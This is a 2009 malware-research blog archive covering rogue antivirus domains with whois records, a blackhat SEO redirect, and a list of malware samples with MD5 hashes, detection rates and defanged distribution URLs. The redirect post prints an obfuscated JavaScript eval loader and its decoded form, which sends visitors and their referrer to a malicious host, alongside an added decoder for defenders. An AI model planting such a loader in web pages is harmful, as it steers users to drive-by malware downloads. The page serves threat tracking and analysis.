Archive for June 3rd, 2009

03 Jun

New rogue domain: antivir-soft.com

Here we are with another rogue domain. It is hosted on the same IP as ones I posted about before, here and here.

/promo1/ Fake Adult-archive.net website
/promo2/ Fake porntube.com website
/promo3/ Fake scanning page
/promo4/ Fake sextube website

Whois entry for antivir-soft.com 78.129.166.166
Plitochnik Ltd
Big Lebowski whitemarik@gmail.com
84522450091 fax: 84522450091
Mira str. 12
Kiev Kiev 375463
ua

03 Jun

Another domain redirecting to rogues using macrosoftwarego.com

Yet another domain associated with the string of blackhat SEO operations using macrosoftwarego.com. See my previous posts #1 and #2.

The page reached from the search results contains the following JavaScript routine.

var str=["762", "777", "770", "759", "776", "765", "771", "770", "692", "743",
"761", "770", "760", "737", "781", "700", "773", "777", "761", "774", "781", "701",
"783", "670", "692", "779", "765", "770", "760", "771", "779", "706", "768", "771",
"759", "757", "776", "765", "771", "770", "721", "699", "764", "776", "776", "772",
"718", "707", "707", "759", "757", "768", "768", "771", "779", "755", "769", "771",
"770", "776", "774", "761", "757", "768", "711", "711", "706", "757", "762", "765",
"774", "775", "776", "760", "765", "758", "775", "706", "759", "771", "769", "707",
"765", "770", "760", "761", "780", "706", "764", "776", "769", "768", "723", "742",
"761", "762", "721", "699", "703", "761", "770", "759", "771", "760", "761", "745",
"742", "733", "727", "771", "769", "772", "771", "770", "761", "770", "776", "700",
"760", "771", "759", "777", "769", "761", "770", "776", "706", "774", "761", "762",
"761", "774", "774", "761", "774", "701", "719", "670", "785"];
var temp='';
var gg='';
for (var i=0; i<str.length; i++){
gg=str[i]-660;                        // each entry is a character code plus 660
temp=temp+String.fromCharCode(gg);    // rebuild the hidden script one character at a time
}
eval(temp);                           // run the decoded script (shown below)

DECODES TO:

function SendMy(query){
  window.location='http://callow_montreal33.afirstdibs.com/index.html?Ref='+encodeURIComponent(document.referrer);
}

If the referrer is one of certain search engines, you are then redirected on to macrosoftwarego.com and from there to the appropriate rogue anti-malware website for a drive-by download.
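As an added example (not code from the post or from the people behind these sites), here is a defender-side decoder for this str[i]-660 scheme: it returns the hidden script instead of passing it to eval(), recovers the offset by requiring every decoded character to be printable ASCII, and lists the embedded URL for blocklisting. The array is the one from the post, embedded so the block runs offline.

```javascript
// Added example: reverse the numeric-array obfuscation above without eval().
// Assumes the obfuscator only subtracts a constant; the offset (660 here) is
// recovered by requiring printable ASCII (tab, LF, CR, 0x20-0x7E) throughout.
// Sample input: the exact array posted above, reproduced so this runs offline.
const SAMPLE = ["762","777","770","759","776","765","771","770","692","743",
  "761","770","760","737","781","700","773","777","761","774","781","701",
  "783","670","692","779","765","770","760","771","779","706","768","771",
  "759","757","776","765","771","770","721","699","764","776","776","772",
  "718","707","707","759","757","768","768","771","779","755","769","771",
  "770","776","774","761","757","768","711","711","706","757","762","765",
  "774","775","776","760","765","758","775","706","759","771","769","707",
  "765","770","760","761","780","706","764","776","769","768","723","742",
  "761","762","721","699","703","761","770","759","771","760","761","745",
  "742","733","727","771","769","772","771","770","761","770","776","700",
  "760","771","759","777","769","761","770","776","706","774","761","762",
  "761","774","774","761","774","701","719","670","785"];

function isPrintable(code) {
  return code === 9 || code === 10 || code === 13 || (code >= 32 && code <= 126);
}

// Decode with a known offset; returns the plaintext instead of executing it.
function decodeOffsetArray(arr, offset) {
  return arr.map(v => String.fromCharCode(Number(v) - offset)).join('');
}

// Recover the offset: only values that map the largest entry to <= 126 and the
// smallest to >= 9 are candidates; return the first that keeps every code printable.
function findOffset(arr) {
  const nums = arr.map(Number);
  const lo = Math.max(...nums) - 126;
  const hi = Math.min(...nums) - 9;
  for (let off = lo; off <= hi; off++) {
    if (nums.every(v => isPrintable(v - off))) return off;
  }
  return null; // no single subtraction yields printable text
}

// Pull URLs out of the decoded script for blocklisting / proxy-log correlation.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"]+/g) || [];
}

const offset = findOffset(SAMPLE);                 // 660 for this sample
const decoded = decodeOffsetArray(SAMPLE, offset);
console.log('offset:', offset);
console.log(decoded);
console.log('indicators:', extractUrls(decoded));
```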

Whois entry for afirstdibs.com 84.16.229.43
Smith
Kevin L (KevinLSmith@text2re.com)
3924 Chathamway
Washington
Gansu,20200
CN
Tel. +240.5484495

03 Jun

New rogue domain: pcoutsecurity.com

Rogue domain found today. The domain does not resolve at the moment, but I'm sure it will soon. It was also just registered. I will update this post as more information becomes available.

Whois entry for pcoutsecurity.com
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

03 Jun

Database Update: 22 files (Low/Moderate Detection)

Here are some files added to our database over the last couple of days.

WARNING: URLs may still be active. Proceed at your own risk!

sophialite.exe
Result: 23/40 (57.5%)
MD5: 738c50d43ed4154edac1ea5796ab8b1d
VirusTotal
ThreatExpert Analysis
hxxp://direct-certs.bankofamerica.com.fwdidstr.com/direct/certupdate/update.aspx/

sdra64.exe
Result: 15/40 (37.5%)
MD5: 3bb0e2a070121c09453c49a2e6121648
VirusTotal
ThreatExpert Analysis

load.exe
Result: 0/40 (0%)
MD5: 52e5d2f6dbaf618f5c91e97cd9d810d6
VirusTotal
ThreatExpert Analysis
hxxp://s76z.cn/data/exe.php

sun.exe or owner.exe
Result: 13/40 (32.5%)
MD5: 39255093f4553bd68dff8441218abfa3
VirusTotal
ThreatExpert Analysis
hxxp://r99u.cn/myl/exe/

netsik.sys
Result: 22/40 (55%)
MD5: 94e70936cea0f3fa053b914a5bf0c311
VirusTotal
ThreatExpert Analysis

loader.exe or owner.exe
Result: 9/40 (22.5%)
MD5: b5b4188090683c97eb33394e4fd2ee60
VirusTotal
ThreatExpert Analysis
hxxp://r99u.cn/myl/exe/

ati64si.sys
Result: 18/40 (45%)
MD5: 9f273ad2316e9c9a722e9a6d8bf485b8
VirusTotal
ThreatExpert Analysis

calc.ifo
Result: 4/40 (10%)
MD5: a87bae24bce1beee32ac5a51ab9b5cb4
VirusTotal

VideoCodec.exe
Result: 8/40 (20%)
MD5: bb5b6f4a8a508ff1a2b0d6c467226a66
VirusTotal
ThreatExpert Analysis
hxxp://aofexo.com/download/3575375651673d3dfe4e941820090516/

BlueRaTech.exe
Result: 5/39 (12.83%)
MD5: 5470a99a1d3ca57babf7b472b40a8fbb
VirusTotal
ThreatExpert Analysis

softwarefortubeview.42002.exe
Result: 10/40 (25%)
MD5: f4814122cad0e19115182c5805313c13
VirusTotal
ThreatExpert Analysis
hxxp://exe-soft-development.com/

3388.exe or 216.jpg or msa.exe
Result: 6/40 (15%)
MD5: 32a1b6b307c426cb5ccfd0fa9fdab028
VirusTotal
ThreatExpert Analysis
hxxp://picturephotoweb.com/werber/84e29000321/

11388.exe or file.exe
Result: 29/40 (72.5%)
MD5: 1918d01a239cf69b4e339bcdb5deb383
VirusTotal
ThreatExpert Analysis
hxxp://streaming-united.com/

5930.exe or perce.jpg
Result: 6/40 (15%)
MD5: f8400e21dff1061cf49cf39adf1c23ec
VirusTotal
ThreatExpert Analysis
hxxp://imageempires.com/perce/f52ce20214aada6b1d54d1bd681ced79e8cff050ebc2c0c49e59c830600999682e8c6f382442a74e9/74f2f090d27/

6080.exe or item.gif
Result: 7/40 (17.5%)
MD5: 7f5cf13888ea50644455ac63befa2f1c
VirusTotal
ThreatExpert Analysis
hxxp://theimagesstudio.com/item/85ac72d2843a9a5bddf4110d682cadc9482f30805b7220941ea98810306989b81efc9fa83432f71e2/14229030c25/

msxml71.dll
Result: 3/40 (7.5%)
MD5: 7bce14ecbe6988abd2171adef4640c5a
VirusTotal
ThreatExpert Analysis

d373f.pdf
Result: 14/39 (35.9%)
MD5: 6a04a9b5b81a18520b15b0f83013bb2c
VirusTotal
Wepawet Analysis
hxxp://fastinate.com/image/pfre.php

daa.exe or install.exe or sysguard.exe
Result: 20/39 (51.28%)
MD5: 0c4bb8ffba3360547d963a0d86d224f8
VirusTotal
ThreatExpert Analysis
hxxp://fastinate.com/image/ouet.php

avplay.exe
Result: 12/38 (31.58%)
MD5: 3cbd350dc2ec7d13ddcb2170796c2da9
VirusTotal
ThreatExpert Analysis
hxxp://122.224.4.133:30100/

iesuper.exe
Result: 10/40 (25%)
MD5: 96b7c8e08aff36600308467eb16cf478
VirusTotal
ThreatExpert Analysis

all.exe
Result: 10/40 (25%)
MD5: a9f38aee755868dad97fb5d92a8fafb3
VirusTotal
ThreatExpert Analysis

sethome.exe
Result: 20/39 (51.29%)
MD5: d715a861403b9a069494f56b8d807683
VirusTotal
ThreatExpert Analysis